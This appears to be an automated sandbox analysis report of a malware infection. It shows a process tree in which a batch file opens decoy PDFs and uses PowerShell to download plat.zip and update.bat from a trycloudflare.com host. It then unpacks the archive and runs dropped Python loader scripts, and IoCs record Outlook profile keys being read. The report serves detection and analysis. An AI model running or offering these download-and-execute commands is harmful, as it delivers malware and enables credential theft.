PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 2152	852	msedge.exe	86
PID 852 wrote to memory of 1920	852	msedge.exe	87
PID 852 wrote to memory of 1920	852	msedge.exe	87
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88
PID 852 wrote to memory of 2592	852	msedge.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	notepad.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://tiny-fixtures-glossary-advantage.trycloudflare.com
  2⤵
  - Enumerates system info in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffbb6046f8,0x7fffbb604708,0x7fffbb604718
    3⤵
    PID:468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
    3⤵
    PID:2152
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
    3⤵
    PID:2592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
    3⤵
    PID:2772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    3⤵
    PID:5000
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
    3⤵
    PID:1688
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3780
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
    3⤵
    PID:2832
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
    3⤵
    PID:4348
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
    3⤵
    PID:5112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
    3⤵
    PID:3628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5416 /prefetch:8
    3⤵
    PID:4280
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2232 /prefetch:1
    3⤵
    PID:5264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5276
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5560 /prefetch:8
    3⤵
    PID:5972
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
    3⤵
    PID:6028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
    3⤵
    PID:3612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5828 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
    3⤵
    PID:5604
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5776 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5348
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6232 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3276
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
    3⤵
    PID:2576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5340 /prefetch:6
    3⤵
    PID:452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
    3⤵
    PID:4192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5576 /prefetch:8
    3⤵
    PID:1204
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
    3⤵
    PID:4576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5688 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
    3⤵
    PID:6884
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
    3⤵
    PID:6812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
    3⤵
    PID:6980
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
    3⤵
    PID:6984
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
    3⤵
    PID:5416
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6432 /prefetch:6
    3⤵
    PID:5520
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5824 /prefetch:8
    3⤵
    PID:4436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
    3⤵
    PID:2408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6364 /prefetch:8
    3⤵
    PID:6860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:6900
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
    3⤵
    PID:2352
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4628 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\new.bat" "
    3⤵
    PID:2076
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tiny-fixtures-glossary-advantage.trycloudflare.com/policy.pdf
      4⤵
      PID:5960
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffbb6046f8,0x7fffbb604708,0x7fffbb604718
        5⤵
        
        PID:4028
  - - C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      4⤵
      Delays execution with timeout.exe
      PID:7060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://tiny-fixtures-glossary-advantage.trycloudflare.com/plat.zip' -OutFile 'C:\Users\Admin\Downloads\plat.zip' }"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\plat.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4580
  - - C:\Users\Admin\Downloads\Python\Python312\python.exe
      python.exe x.py
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:5396
  - - C:\Users\Admin\Downloads\Python\Python312\python.exe
      python.exe eu.py
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:4960
  - - C:\Users\Admin\Downloads\Python\Python312\python.exe
      python.exe blo.py
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:4804
  - - C:\Users\Admin\Downloads\Python\Python312\python.exe
      python.exe loader.py
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:6796
  - - C:\Users\Admin\Downloads\Python\Python312\python.exe
      python.exe hey.py
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:1336
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tiny-fixtures-glossary-advantage.trycloudflare.com/a.pdf
      4⤵
      PID:4192
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffbb6046f8,0x7fffbb604708,0x7fffbb604718
        5⤵
        
        PID:1404
  - - C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
      4⤵
      Delays execution with timeout.exe
      PID:592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://tiny-fixtures-glossary-advantage.trycloudflare.com/update.bat' -OutFile 'C:\Users\Admin\Downloads\update.bat' }"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5064
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6880 /prefetch:1
    3⤵
    PID:5052
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
    3⤵
    PID:5384
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2100,9215263318288246310,2465357647964865565,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5440 /prefetch:6
    3⤵
    PID:4540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
